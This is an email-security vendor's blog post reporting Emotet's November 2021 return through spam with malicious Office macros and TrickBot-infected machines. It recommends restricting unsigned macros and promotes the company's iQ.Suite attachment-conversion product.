Published On: November 25, 2021

Emotet strikes again

Computers infected with TrickBot are at risk

The German Federal Criminal Police Office (BKA) calls it the “most dangerous malware in the world”

Not even a year has passed since Emotet was officially shut down by authorities in January 2021, when security researcher Brad Duncan reported its return. There are indications that as of November 15, the spam campaigns of one of the most dangerous and successful Trojans are back in play to infiltrate its harmful codes into companies and even open the gateways for ransomware.

The attackers often make the spam look like a normal email about payments or even a reply to a previous email. But once the infected attachments or links on compromised documents are opened, Emotet gets into the memory using PowerShell with the help of malicious macros or JavaScript. For tips on which files to watch out for, see Malwarebytes and Brad Duncan’s blog post.

The evolution of Emotet

When it emerged in 2014, Emotet was primarily a banking Trojan that steals private data and uses its worm-like capabilities to spread to all computers on a network. However, in 2016 and 2017, it evolved into one of the most expensive spam and malware threats, which even allowed other criminal programs, such as TrickBot or Qbot, to sneak in their ransomware on already infected computer.

In January 2021, the German Federal Criminal Police Office (BKA), together with law enforcement agencies from seven other countries, took out what they called “the most dangerous malware in the world.” Yet the joy didn’t last long. On November 15, security researcher Brad Duncan discovered signs that Emotet was back when machines already infected with TrickBot began downloading Emotet files. This was also followed by Emotet’s well-known spam campaigns with the malicious macros hidden in a Word or Excel document, or a zipped Word file that requires a password.

Is there a protection that really works?

What does the return of this extremely dangerous malware mean for businesses? First of all, they need to secure their systems to be able to detect Emotet. Because even if at the moment only computers infected with TrickBot are threatened, it is quite likely that the mechanism of the attacks will evolve and put everyone at risk. As the Federal Criminal Police Office itself recommends, the most effective prevention is to restrict unsigned macros.

With iQ.Suite against Emotet
GBS has been a leading provider of email security solutions for 30 years, and our experts are committed to developing solutions that eliminate the risk of existing and future threats. iQ.Suite, GBS’ leading email security product, and its as-a-service version for the cloud iQ.Suite aaS provide comprehensive protection against a wide range of attack types. The Convert module of iQ.Suite can be used alone or in combination with Watchdog and Wall to neutralize potential threats. It follows a three-step process to protect against Trojans and other malware and converts the malicious email attachments to defuse them.

    • Step 1Identify dangerous content

In combination with Watchdog, the Convert module can identify harmful files. iQ.Suite Convert removes the potentially dangerous macros and delivers the clean file to the recipient.

    • Step 2: Convert to PDF to eliminate macros

Emails containing potentially dangerous Office documents can be stopped and converted to PDF format with iQ.Suite Convert. The recipient receives the original attachment as a PDF file. If the file is infected, the conversion removes ransomware, encryption Trojans, malicious macros from Office files and hidden information such as history data. Active malicious code no longer poses a threat. If the file is deemed non-threatening, it is delivered in its original format.

    • Step 3: Centralized compression to save place

Whether sending or receiving, the transfer of email attachments, especially large files, places a burden on the network infrastructure and takes up valuable storage capacity. With flexible rules, email attachments are compressed centrally on the server and converted to ZIP format. This results in smaller mailboxes and improved performance in your email infrastructure.

Whether you choose iQ.Suite or take other measures, it’s important to implement a strong email security. Because relying that it won’t happen to you is more dangerous than the king of malware Emotet.